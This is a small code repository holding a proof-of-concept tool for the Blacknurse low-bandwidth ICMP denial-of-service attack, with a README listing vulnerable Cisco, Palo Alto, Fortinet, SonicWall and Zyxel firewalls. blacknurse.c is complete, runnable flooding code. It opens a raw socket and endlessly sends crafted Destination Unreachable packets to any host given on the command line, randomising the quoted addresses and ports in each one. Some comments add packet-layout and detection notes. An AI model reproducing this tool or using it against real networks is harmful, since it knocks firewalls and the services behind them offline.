├── .gitignore ├── LICENSE ├── Makefile ├── README.md └── blacknurse.c /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | *.obj 5 | *.elf 6 | 7 | # Precompiled Headers 8 | *.gch 9 | *.pch 10 | 11 | # Libraries 12 | *.lib 13 | *.a 14 | *.la 15 | *.lo 16 | 17 | # Shared objects (inc. Windows DLLs) 18 | *.dll 19 | *.so 20 | *.so.* 21 | *.dylib 22 | 23 | # Executables 24 | *.exe 25 | *.out 26 | *.app 27 | *.i*86 28 | *.x86_64 29 | *.hex 30 | 31 | # Debug files 32 | *.dSYM/ 33 | *.su 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 2-Clause License 2 | 3 | Copyright (c) 2016, Frank Denis 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 17 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 18 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 19 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 20 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 21 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 22 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 23 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 24 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 25 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | blacknurse: blacknurse.c 2 | $(CC) $(CFLAGS) $(LDFLAGS) -O2 -o blacknurse blacknurse.c 3 | 4 | clean: 5 | @rm -f blacknurse 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | A simple PoC for the [Blacknurse](http://www.blacknurse.dk/) attack. 2 | 3 | "Blacknurse is a low bandwidth ICMP attack that is capable of doing 4 | denial of service to well known firewalls". 5 | 6 | Blacknurse apparently makes the CPU hot on: 7 | * Cisco ASA 5505, 5506, 5515, 5525 , 5540 (default settings) 8 | * Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface - 100% CPU load 9 | * Cisco ASA 5550 (Legacy) and 5515-X (latest generation) 10 | * Cisco Router 897 - Can be mitigated 11 | * SonicWall - Misconfiguration can be changed and mitigated (Enable Anti-DDOS) 12 | * Palo Alto 5050 Firewalls with firmware 7.1.4-h2 13 | * Zyxel NWA3560-N (Wireless attack from LAN Side) 14 | * Zyxel Zywall USG50 15 | * Fortinet v5.4.1 - One CPU consumed 16 | * Fortigate units 60c and 100D (even with drop ICMP on) 17 | * SonicWall 18 | * Maybe more 19 | 20 | See [blacknurse.dk](http://www.blacknurse.dk) for the full list and updates. 
21 | 22 | Vendor responses: 23 | * [Checkpoint](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk114500) 24 | * [Fortinet](https://blog.fortinet.com/2016/11/14/black-nurse-ddos-attack-power-of-granular-packet-inspection-of-fortiddos-with-unpredictable-ddos-attacks) 25 | * [Palo Alto](http://researchcenter.paloaltonetworks.com/2016/11/note-customers-regarding-blacknurse-report/) 26 | 27 | This attack is 20+ years old, but it didn't had a logo. 28 | -------------------------------------------------------------------------------- /blacknurse.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | /* main: resolves the IPv4 host named in argv[1], opens a raw ICMP socket and sends the 36-byte template below to that address in an endless loop. Exits with status 1 on a usage, name-resolution or socket error. */ int main(int argc, char *argv[]) 14 | { 15 | /* Wire layout of the template: bytes 0-7 are an ICMP header with type 3, code 3 (Destination Unreachable / Port Unreachable) and checksum field 0x0d33; bytes 8-27 are the quoted IPv4 header (version 4, IHL 5, total length 28, TTL 64, protocol 6 (TCP), source 1.2.3.4, destination 5.6.7.8); bytes 28-35 are the first 8 bytes of the quoted datagram's payload. For detection and filtering, the stable signature is the ICMP type/code pair and the packet rate, not the quoted header. */ uint8_t pkt_template[] = { 16 | 0x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00, 17 | 0x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00, 18 | 0x00, 0x08, 0xef, 0xc1 19 | }; 20 | uint8_t *pkt; 21 | struct addrinfo *ai, hints; 22 | const char *host; 23 | struct pollfd pfd; 24 | const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]); 25 | size_t i; 26 | int gai_err; 27 | int kindy; 28 | 29 | if (argc < 2) { 30 | fprintf(stderr, "Usage: blacknurse \n"); 31 | exit(1); 32 | } 33 | host = argv[1]; 34 | memset(&hints, 0, sizeof hints); 35 | /* Restrict resolution to IPv4: the template is an ICMPv4 message. */ hints.ai_family = AF_INET; 36 | if ((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) { 37 | fprintf(stderr, "Unable to use [%s]: %s\n", host, 38 | gai_strerror(gai_err)); 39 | exit(1); 40 | } 41 | /* Raw ICMP socket: the buffer handed to sendto() starts at the ICMP header and the kernel supplies the outer IP header. Creating a raw socket normally requires elevated privileges (e.g. root or CAP_NET_RAW on Linux). */ if ((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) { 42 | perror("socket"); 43 | exit(1); 44 | } 45 | /* pkt aliases the template, so the loop below edits the array in place. */ pkt = pkt_template; 46 | pfd.fd = kindy; 47 | pfd.events = POLLOUT; 48 | for (;;) { 49 | /* Overwrites bytes 20-31 before every send: the quoted source and destination addresses (8 bytes) and the next 4 bytes, where a transport header carries its port numbers. Every packet therefore quotes a different flow, so the quoted addresses and ports are not a usable match key for this traffic. */ for (i = 20; i < 20 + 8 + 4; i++) { 50 | pkt[i] = (uint8_t) 
rand(); 51 | } 52 | if (sendto(kindy, pkt, pkt_len, 0, 53 | ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) { 54 | /* ENOBUFS (send queue full): wait up to 1000 ms for the socket to become writable, then retry; poll()'s return value is not checked. Any other sendto() failure is reported and ends the loop. */ if (errno == ENOBUFS) { 55 | poll(&pfd, 1, 1000); 56 | continue; 57 | } 58 | perror("sendto"); 59 | break; 60 | } 61 | } 62 | /* Reached only when a sendto() failure other than ENOBUFS breaks the loop. NOTE(review): the process still returns 0 in that case. */ 63 | close(kindy); 64 | freeaddrinfo(ai); 65 | 66 | return 0; 67 | } 68 | --------------------------------------------------------------------------------